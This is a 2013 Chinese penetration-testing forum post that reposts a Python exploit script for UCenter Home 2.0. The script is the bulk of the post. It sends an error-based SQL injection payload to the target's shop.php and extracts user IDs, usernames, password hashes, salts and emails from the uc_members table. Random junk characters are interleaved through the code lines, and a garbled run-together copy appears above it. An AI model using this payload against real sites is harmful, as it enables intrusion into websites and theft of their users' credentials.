找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1942|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
% `- a9 }0 K& V$ E# W. ] ' s8 }4 s0 A# r/ R

, z% a3 d* }6 Z' x) c#!/usr/bin/env python  / L: v4 V: I3 n. `. R( E# r
, I! b# w3 h1 z1 ~. i8 Q: \
import sys  
# J* n4 L5 g$ Eimport urllib2  ! S$ e; y$ c) `9 [; E
import re  + r4 |+ \, Q5 G4 Q& n' \
2 [6 z  x) ]) j1 P# Q
def info():  
$ L9 B2 y$ ^7 D0 \    print 'From:http://www.exploit-db.com/exploits/14997/'
9 g- t$ }& ^! d; T7 y* c    print 'http://www.hake.cc/Web_loudong/' , u* O$ x& u% Q
    print 'changed:qiaoy'  8 ]* N% U! n3 z, D  K& r
    print 'exp:'  
* s' K0 o/ Q; S5 `$ I& c& V- J    print ' ./UCenter_Home_2.0.py site'  9 V- z9 ~2 t/ r" m
1 \/ J* b9 c0 H" E* h
def main():  . \9 F/ A3 j) @( Y5 D3 J' P
    if len(sys.argv) != 2:  
$ P; A4 R# }# v0 X! v9 ~5 c+ Q* R        info()  
4 N$ K5 ?7 D3 R- I$ H; Q9 ^. F    else:  ; s1 o  f+ j0 [
        site = sys.argv[1]  / m& c! ~- m6 y8 g9 g( ^
        if site[0:7] == 'http://':  
* d5 I* W/ k; q% F6 d' _            sitesite =site  
" f4 E- n. V! q: [        elif site[0:8] == 'https://':  
8 b( U! y- h1 m- M/ S0 a            sitesite = site  $ s# m3 f8 E6 \1 j& G" {
        else:  
& L' G# R7 [  O6 B            site = 'http://'+site  ) K3 x! N. U! r
        try:  
9 r! [4 }6 h" [/ T. N            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
1 {- {: W  a1 c2 S* l# j/ Z            Value = urllib2.urlopen(url).read()  9 h( `" O) K( u- \5 T
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
# \$ x- Y$ n. s% k            hacked = Msg.split(':')  - k: Q/ O; D* T' u1 a6 O9 K
            print 'Name:    '+hacked[1]  % T, C7 ]$ P3 k* W7 h
            print 'Passwd:  '+hacked[2]  
4 I; ^9 u3 Q$ R7 U& W) Z            print 'salt:    '+hacked[3]  ; h7 l2 I+ ?1 v  C" P
            print 'email:   '+hacked[4]  5 M. P$ ~/ N2 K4 P/ _- k$ F
        except:  
! j7 D$ t7 S& @            print 'Sorry,I can\'t work............'  
% O' R/ J: h& ?
9 q  _# s7 l* Oif __name__ == '__main__':  
& Y/ v" |3 r6 }: r* x6 g" Q. Y    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表